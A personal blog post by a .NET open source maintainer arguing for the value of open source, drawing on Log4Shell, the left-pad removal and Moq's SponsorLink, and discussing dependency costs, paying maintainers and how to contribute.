As I am an open source maintainer myself, I want to highlight my personal thoughts on why open source is important. I will put a bit more focus on the .NET side of things, but most of the thoughts are "valid" in the broader open source world.
Where do we use open source?
Let's start by a small experiment: On the following picture identify how many products you use in your private or professional work?
Chances are high that you will use at least one of them. Bonus point for bUnit! The majority of products are built to some extent on open source products or libraries. Most of the time they are not backed by a multi-million dollar company that can support FTEs working on the project. One of the most extreme cases is probably Log4J. The most famous logging library in the Java ecosystem. The main work is done by a handful of maintainers without no financial support. Just to give you some perspective, some of the biggest companies in the world are using Log4J: Apple, Amazon, Steam, Alibaba, ...
So, by law, I am forced to insert the following picture by XKCD:
Source: https://imgs.xkcd.com/comics/dependency_2x.png
Log4J / Log4Shell
When the infamous Log4Shell was found, it did even get worse. A very brief refresher on what was the issue: A prepared user input can lead to remote code execution via an LDAP server in the context of the application. If you read remote code execution you know shit is hitting the fan! The problem is how the issue was perceived by exactly those very companies that are using Log4J. According to this article the maintainers received such a message:
We promise to keep it secret until your official release version comes out. Please hurry up.
I do understand that with a remote code execution vulnerability you might have to shutdown affected services. Imagine you are Amazon or Alibaba: Shutting down server can cost you millions and billions in revenue in a very short time. But nothing stopped them from not supporting the project before. The maintainers tweeted this about the situation:
Keep in mind: The project, at the time, was done by volunteers. They didn't receive money. They did this in their freetime!
Other events
This wasn't the only incident where we saw issues in the open source space and how they were handled:
LeftPad for example was a NPM package that was deleted because of the dispute between the maintainer, NPM and a company. The basic gist: The maintainer "Azer" did have a package under the name "kik". On the other side there was the company "kik" which wanted to have the name reserved for themselves! As "Azer" already did occupy the name, lawyers were involved. And basically NPM sided with "kik" and gave the name to the company. "Azer" then removed his most used library "leftpad" (yes you could just delete packages from NPM). Of course if you used "leftpad" directly or transitive (dependency of one of your dependencies) your build broke! And here a bit my grain of salt: Independent of leftpad and similiar libraries: Micro-libraries, especially in this site, are really really hard to justify. I will showcase this later in the article.
Moq is one of the most famous mocking libraries in the dotnet ecosystem. The creator Daniel Cazzulino (more known as kzu) tried a different approach for monetization: He developed SponsorLink. Basically at the time, it checked if your user donated to the library where SponsorLink is used. It did this by doing an HTTP request to some server. For some more details, I wrote a full article: "What's going on with Moq? SponsorLink and burnt soil!".
The was quite some backlash about this, but it shows some fundamental flaws:
- Open Source projects are considered free (as in free labour and free usage)
- Monetization is hard!
- Keep a project healthy over a longer period of time
But let's start with the first:
Is open source free?
We can make the simple answer: Yes. Of course!? I mean, I can just download any package and use it, not? Well yes and no. Of course using open source projects are "free". In the sense of that you didn't pay for the labour to create them, but you have some different cost: maintenance and dependencies. That sounds odd, doesn't it? I mean isn't that a reason why people use other peoples libraries? To have less maintenance?
The fee of maintenance
When you use open source, you inherit not only its features but also its lifecycle.
- Open source libraries evolve over time. They might have critical issues where you have to update the package. Those might come with breaking changes or all sorts of things where you have to check whether or not your software is still doing what it should do!
- Some open source projects lose active maintainers over time. If you rely on such a library, you’re left with three choices
- Continue using an outdated version (security risk!)
- Migrate to an alternative (might cost a lot of effort without delivering direct value)
- Take over maintenance yourself aka fork. You have the cost of maintenance of the code you need any maybe not need (if you can separate the code in a way that you even know what you need and not need).
- Sometimes, the library you depend on doesn’t fit your needs, so you might have to fork it. Now you also "own" the code with all its cost, dependencies and implications!
In all of those cases you pay! You pay time and money! Every dependency you make, will have a cost! You have to weigh whether or not the cost is justified! And this is something you have to do from time to time not only once in the lifetime of the project. This is especially critical if you use lots of micro libraries. With this I mean things like Left Pad that have more often than not at most 10 lines of code and fulfill very minimalistic functions. Another great example is: is-even and is-odd. Both still have 200000 (yes two-hundred-thousand) downloads a week. Why? Why would anyone need this? The return of invest is exactly how justified?
So no, open source is not free. It is free in the sense of it doesn't cost, but there are costs to almost everything! Of course the same applies to closed source packages you can use. They also have such cost, but they cost you most of the time money on top and you can't watch the development process out in the open.
All those incidents (and many more) I showcased earlier are known and fixed quickly because everything happened openly and transparently! That is something good. I love open source. And there is of course also the side of us, the maintainers!
Should maintainers be paid?
THIS IS MY PERSONAL BID As almost everything in this blog. First of all, there is no "one size fits them all" solution. It depends on the circumstances and an individuals goal with the project. And if they should be paid, by whom?
- Should I donate/fund?
- Should my company do that?
Are there expectations linked to that money? Imagine you get 100$ donated to your OSS and said person/company opens an incident ticket or feature request you deem not very important. Do you feel pressured to do so, just because they gave you money? As you can see, it isn't that easy and straightforward as it may seem. I do know maintainers that will not take money for exactly those reasons.
My personal take is, that one shouldn't expect money from creating open source software (but it is nice to receive some, of course). Well, at least not with the code one is publishing. There are companies like the UNO Platform that open sourced all of their products, but you can pay for an enterprise service contract. So in case you need help or features, they will help you out. So they built the financial product around the open source code itself. Another example is NServiceBus from Particular Service Platform.
While it is nice to have a steady income from your open source contribution for the majority of projects this will just not happen. Donations are nice so that the maintainers at least don't make minus financially wise. They might have costs like servers, certificates and whatnot to run the thing. If you appreciate a project: Please feel free to use one of the common methods like GitHub Sponsors or so.
Also something which is very very important to point out: There is no obligation or warranty on the part of the maintainers to provide support, updates, or specific functionality. Open source contributors often work on their projects in their free time, driven by passion or a desire to give back to the community. Yet, despite this goodwill, the behavior of some users can be deeply discouraging. Using open source software comes with an inherent understanding (or at least, it should) - there is no formal contract between the maintainer and the user. The software is often provided 'as is,' with disclaimers clearly stating that there are no guarantees for fitness, reliability, or suitability for any specific purpose. And yes - this is exactly some part of the cost you pay if you use any dependency.
And with open source, I would also include stuff like this blog (the content not the MIT licensed source code, which obviously is open source). My blog doesn't have a specific license but I regard it as "open source". Basically, everyone can and should take that content as he/she wishes. I don't finance the blog by any sponsors or have ads! In fact, there is no tracking that might identify a person. The only tracking I do is incrementing a counter if a blog post was clicked (without any information from the originator). So open source is not necessarily limited to source code For me! The official definition only includes software as far as I can tell.
But what can you do? Or better:
Why you should support open source!
The most important bid: There is no alternative that is superior in most cases!. We don't have any other system that bring so many upside in contrast to the downsides it has! Maybe another question we can ask: How can I support open source?
How to support open source and what do I gain?
The easiest solution (as with many problems in our world): Throw money at it! Of course this is nice and as explained earlier, also helpful, this isn't the only way. I get excited and a rush if there is someone willing to help out. Someone that takes his/her personal time and resources to make a common (as in shared) good better! If you create a library and someone writes you either a bug report, feature request or files a Pull-Request that is (for me) one of the highest honors you can get. Because that means, that someone can identify themself with what you created. As open source maintainer it is hard to find someone that somewhat sticks around and tries to shape that thing with you. Therefore giving Time is, for me, the most valuable resource you can give!
If you don't know how to start, I always encourage people to support smaller libraries as the cognitive load to step in, is just smaller. Imagine filling a non-trivial PR for dotnet. In bUnit and many other libraries maintainers often use "good first issue":
There are even whole websites like: https://goodfirstissue.dev/ where you can search through repositories.
But what is in for you - you as in you as a contributor? Mainly:
- Gaining knowledge: Discovering other code and thinking patterns can help you strengthening your own hard- and softskills. And yes, maybe that can even land you a job.
- Networking: I met awesome people around the globe just because of open source contributions.
- Altruism: You are doing good for the world. Your code can help directly or indirectly build awesome things!
But maybe the most important thing at the end. If you contribute to any open-source project: Don't be a f$cking asshole! Be polite and try not to be rude. Human collaboration isn't a zero sum game! I would argue (if you know the prisoners dilemma) that contributing together is the way to go!
